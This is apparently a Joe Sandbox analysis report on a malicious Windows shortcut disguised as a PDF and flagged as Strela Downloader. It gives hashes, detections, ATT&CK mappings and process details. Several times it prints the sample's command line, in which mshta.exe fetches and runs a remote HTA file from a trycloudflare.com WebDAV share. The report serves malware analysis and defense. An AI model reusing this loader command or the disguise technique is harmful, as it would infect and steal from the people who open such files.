Edit tour

Windows Analysis Report
RE_005859358438475.pdf.lnk.download.lnk

Overview

General Information

Sample name:RE_005859358438475.pdf.lnk.download.lnk
Analysis ID:1657843
MD5:499ee4b114b59c9743db0e8e12c42e00
SHA1:e8a96fd7d2c0d058b486cf1bec568efea2574398
SHA256:043da7a869ddbde92c6438d8a441b84cd64fc704f9a1b17641d40e98a1ced077
Tags:lnkWsgiDAVuser-JAMESWT_WT
Infos:

Detection

Strela Downloader
Score:72
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Strela Downloader
Opens network shares
Uses an obfuscated file name to hide its real file extension (double extension)
Program does not show much activity (idle)
Searches for the Microsoft Outlook file path

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • mshta.exe (PID: 7132 cmdline: "C:\Windows\System32\mshta.exe" "\\optical-bright-fonts-zealand.trycloudflare.com@SSL\DavWWWRoot\raye.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: mshta.exe PID: 7132JoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: RE_005859358438475.pdf.lnk.download.lnkVirustotal: Detection: 21%Perma Link

    Spam, unwanted Advertisements and Ransom Demands

    barindex
    Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 7132, type: MEMORYSTR
    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
    Source: classification engineClassification label: mal72.rans.spyw.evad.winLNK@1/0@0/0
    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: RE_005859358438475.pdf.lnk.download.lnkVirustotal: Detection: 21%
    Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
    Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
    Source: RE_005859358438475.pdf.lnk.download.lnkLNK file: ..\..\..\..\Windows\System32\mshta.exe
    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior

    Persistence and Installation Behavior

    barindex
    Source: LNK fileProcess created: C:\Windows\System32\mshta.exe

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: Possible double extension: pdf.lnkStatic PE information: RE_005859358438475.pdf.lnk.download.lnk
    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected

    Stealing of Sensitive Information

    barindex
    Source: C:\Windows\System32\mshta.exeFile opened: \\optical-bright-fonts-zealand.trycloudflare.com@ssl\DavWWWRoot\Jump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    DLL Side-Loading
    1
    DLL Side-Loading
    1
    Masquerading
    OS Credential Dumping1
    Network Share Discovery
    Remote Services1
    Email Collection
    Data ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    DLL Side-Loading
    LSASS Memory1
    Process Discovery
    Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    Obfuscated Files or Information
    Security Account Manager2
    System Information Discovery
    SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1657843 Sample: RE_005859358438475.pdf.lnk.... Startdate: 06/04/2025 Architecture: WINDOWS Score: 72 8 Windows shortcut file (LNK) starts blacklisted processes 2->8 10 Multi AV Scanner detection for submitted file 2->10 12 Yara detected Strela Downloader 2->12 14 Uses an obfuscated file name to hide its real file extension (double extension) 2->14 5 mshta.exe 2->5         started        process3 signatures4 16 Opens network shares 5->16

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    RE_005859358438475.pdf.lnk.download.lnk21%VirustotalBrowse
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No contacted domains info
    No contacted IP infos
    Joe Sandbox version:42.0.0 Malachite
    Analysis ID:1657843
    Start date and time:2025-04-06 19:14:26 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 3m 50s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:12
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:RE_005859358438475.pdf.lnk.download.lnk
    Detection:MAL
    Classification:mal72.rans.spyw.evad.winLNK@1/0@0/0
    EGA Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Found application associated with file extension: .lnk
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
    • Excluded IPs from analysis (whitelisted): 4.175.87.197, 184.31.69.3
    • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtProtectVirtualMemory calls found.
    TimeTypeDescription
    13:15:23API Interceptor1x Sleep call for process: mshta.exe modified
    No context
    No context
    No context
    No context
    No context
    No created / dropped files found
    File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=11, Archive, ctime=Wed Nov 13 02:14:06 2024, mtime=Wed Nov 13 02:14:06 2024, atime=Wed Nov 13 02:14:06 2024, length=32768, window=hidenormalshowminimized
    Entropy (8bit):3.88181430059045
    TrID:
    • Windows Shortcut (20020/1) 100.00%
    File name:RE_005859358438475.pdf.lnk.download.lnk
    File size:2'863 bytes
    MD5:499ee4b114b59c9743db0e8e12c42e00
    SHA1:e8a96fd7d2c0d058b486cf1bec568efea2574398
    SHA256:043da7a869ddbde92c6438d8a441b84cd64fc704f9a1b17641d40e98a1ced077
    SHA512:463fb5f47df8762aa7695696df8c1ea43361dfb2dbe9cc5172f8b3e40bf0408d9e53ab28db3692df524e8b6295a6ef58fd02c0bc0a950c5c4ed09022c8d7e4bf
    SSDEEP:48:8gjmMEzQKrGWeLMeTVdLXuHz7Jk7gF2JqsQ+v0YW+:8gj7Ow4efuTWsFCqsQc0b+
    TLSH:47513F012BF80761F3B68A71087AB2206E32BC96E951C76E1490438C0872F14DE2AF7B
    File Content Preview:L..................F.@.. ....wh.z5..'.j.z5..'.j.z5..........................;....P.O. .:i.....+00.../C:\...................V.1.....)Z....Windows.@........R.@)Z..............................+.W.i.n.d.o.w.s.....Z.1.....CZL:..System32..B........R.@CZL:......
    Icon Hash:72d282828e8d8dd5

    General

    Relative Path:..\..\..\..\Windows\System32\mshta.exe
    Command Line Argument:"\\optical-bright-fonts-zealand.trycloudflare.com@SSL\DavWWWRoot\raye.hta"
    Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    No network behavior found
    050100s020406080100

    Click to jump to process

    050100s0.005101520MB

    Click to jump to process

    Target ID:0
    Start time:13:15:23
    Start date:06/04/2025
    Path:C:\Windows\System32\mshta.exe
    Wow64 process (32bit):false
    Commandline:"C:\Windows\System32\mshta.exe" "\\optical-bright-fonts-zealand.trycloudflare.com@SSL\DavWWWRoot\raye.hta"
    Imagebase:0x7ff6da670000
    File size:14'848 bytes
    MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
    Has exited:false
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

    No disassembly